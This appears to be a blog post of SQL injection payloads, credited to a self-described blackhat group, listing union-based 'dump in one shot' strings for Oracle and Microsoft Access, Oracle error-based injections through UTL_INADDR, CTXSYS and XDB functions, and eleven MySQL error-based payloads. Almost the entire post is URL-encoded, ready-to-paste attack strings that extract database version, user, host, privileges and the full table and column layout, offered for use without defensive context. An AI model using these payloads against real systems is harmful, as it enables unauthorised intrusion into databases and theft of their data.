SQLI | SQL INJECTION | SYBASE | ORACLE | POSTGRESQL | SQLITE | IMB DB2 | MICROSOFT ACCESS | MSSQL

Comments off | SQL By · 12/10/2022



MYSQL | SYBASE | POSTGRESQL | IMB DB2 | ORACLE | SQLITE | INFORMIX | FIREBIRD | MICROSOFT ACCESS | MICROSOFT SERVER [MSSQL] | PHPMYWIND [MYSQL]

Re-Upload : 14 Juli 2022
========================

@Arjuna Dewangga
@Javanese BlackHat ID 14

========================
Credit : all Dewangga
Credit : PostgreSQL : Chaplin

SQLI UNION BASED :

– ORACLE SQL INJECTION
– POSTGRE SQL INJECTION
– SQLITE INJECTION
– SYBASE INJECTION
– MICROSOFT SQL SERVER INJECTION ( MSSQL Injection )
– MICROSOFT SQL ACCESS INJECTION
– IMB DB2 INJECTION

=================================

# DIOS MICROSOFT SQL ACCESS

and 1=0 UNION SELECT 1,2,3,4 from MSysAccessObjects

atau gunakan table/columns biasanya ( Microsoft access )

# DIOS ( ORACLE )

concat(‘DEW’,’%3cimg src=”link img” height=”290″ width=”290″%3e’||’%3cbr%3e’||’%3cli%3e’||’PRINT SYSTEM’||’%3cli%3e’||’VERSION :: ‘||(SELECT BANNER from V$version where rownum=1)||’%3cli%3e’||’DATABASE :: ‘||SYS.DATABASE_name||’%3cli%3e’||’ HostName IP Address :: ‘||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_address||’%3cbr%3e’||’ %3e%3e%3e ‘||(SELECT host_name FROM v$instance where rownum=1)||’%3cbr%3e’||’ %3e%3e%3e ‘||UTL_INADDR.get_host_name||’%3cli%3e’||’USER :: ‘||user||’%3cli%3e’||’DB FILLES :: ‘||(SELECT name FROM V$DATAFILE where rownum=1)||’%3cli%3e’||’PRIVILEGES :: ‘||(SELECT grantee FROM dba_sys_privs where rownum=1)||’%3cli%3e’||’SERVER OPERATING SYSTEM :: ‘||(select member from v$logfile where rownum=1)||’%3cli%3e’||’THE SERVER SID :: ‘||(select instance_name from v$instance)||’%3cbr%3e’||’%3cbr%3e’||’%3cli%3e’||’DUMP DB’||’%3cbr%3e’||(select wm_concat(‘%3cli%3e’||table_name||’ %3e%3e%3e ‘||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c167))||’%3c!–‘

From Dual

ENCODE/DECODE = CHR
Jika tidak bisa WN_CONCAT ganti dengan LISTAGG

or 1=utl_inaddr.get_host_name(CHR(60)||CHR(98)||CHR(114)||CHR(62)||user||CHR(60)||CHR(98)||CHR(114)||CHR(62)||sys.database_name||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select banner from v%24version where rownum=1)||CHR(60)||CHR(98)||CHR(114)||CHR(62)||(select wm_concat(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum%3c25))

(select LISTAGG(CHR(60)||CHR(108)||CHR(105)||CHR(62)||table_name||CHR(32)||CHR(62)||CHR(62)||CHR(62)||CHR(32)||column_name) within group (ORDER BY table_name) from all_tab_columns where rownum%3c25)

ERROR BASED

And 1=UTL_INADDR.GET_HOST_NAME((select banner from v$version where rownum=1))%3b

And 1=UTL_INAADR.GET_HOST_ADDRESS((select banner from v$version where rownum=1))%3b

And 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),user,user)%3b

and 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))%3b

and 1= and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null —

And 1=and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null —

And 1=and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null —

And 1=and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null —

And 1=and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null —

And 1= and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–

# DIOS ERROR BASED MYSQL

1.updatexml()
select %2a from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%3b

2.extractvalue()
select %2a from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))%3b

3.exp()
select %2a from users where id=1 and exp(%7e(select %2a from(select user())a))%3b

4.geometrycollection()
select %2a from users where id=1 and geometrycollection((select %2a from(select %2a from(select user())a)b))%3b

5.multipoint()
select %2a from users where id=1 and multipoint((select %2a from(select %2a from(select user())a)b))%3b

6.polygon()
select %2a from users where id=1 and polygon((select %2a from(select %2a from(select user())a)b))%3b

7.multipolygon()
select %2a from users where id=1 and multipolygon((select %2a from(select %2a from(select user())a)b))%3b

8.linestring()
select %2a from users where id=1 and linestring((select %2a from(select %2a from(select user())a)b))%3b

9.multilinestring()
select %2a from users where id=1 and multilinestring((select %2a from(select %2a from(select user())a)b))%3b

10.floor
select %2a from users where id=1 and (select 1 from (select count(%2a),concat(user(),floor(rand(0)%2a2))x from information_schema.tables group by x)a)%3b

11.PROCEDURE ANALYSE
+PROCEDURE ANALYSE+(EXTRACTVALUE(0,CONCAT(0x27,0x3a,@@VERSION)),1)

# Ket : Decode URL
===============
#SQLI #Sqlinjection #sqlihardbypass #sqlichallenge #sqlchall

THANKS

53GB.COM GPTSTORE CPU Yougpt Gptsio Gpt-store-Nav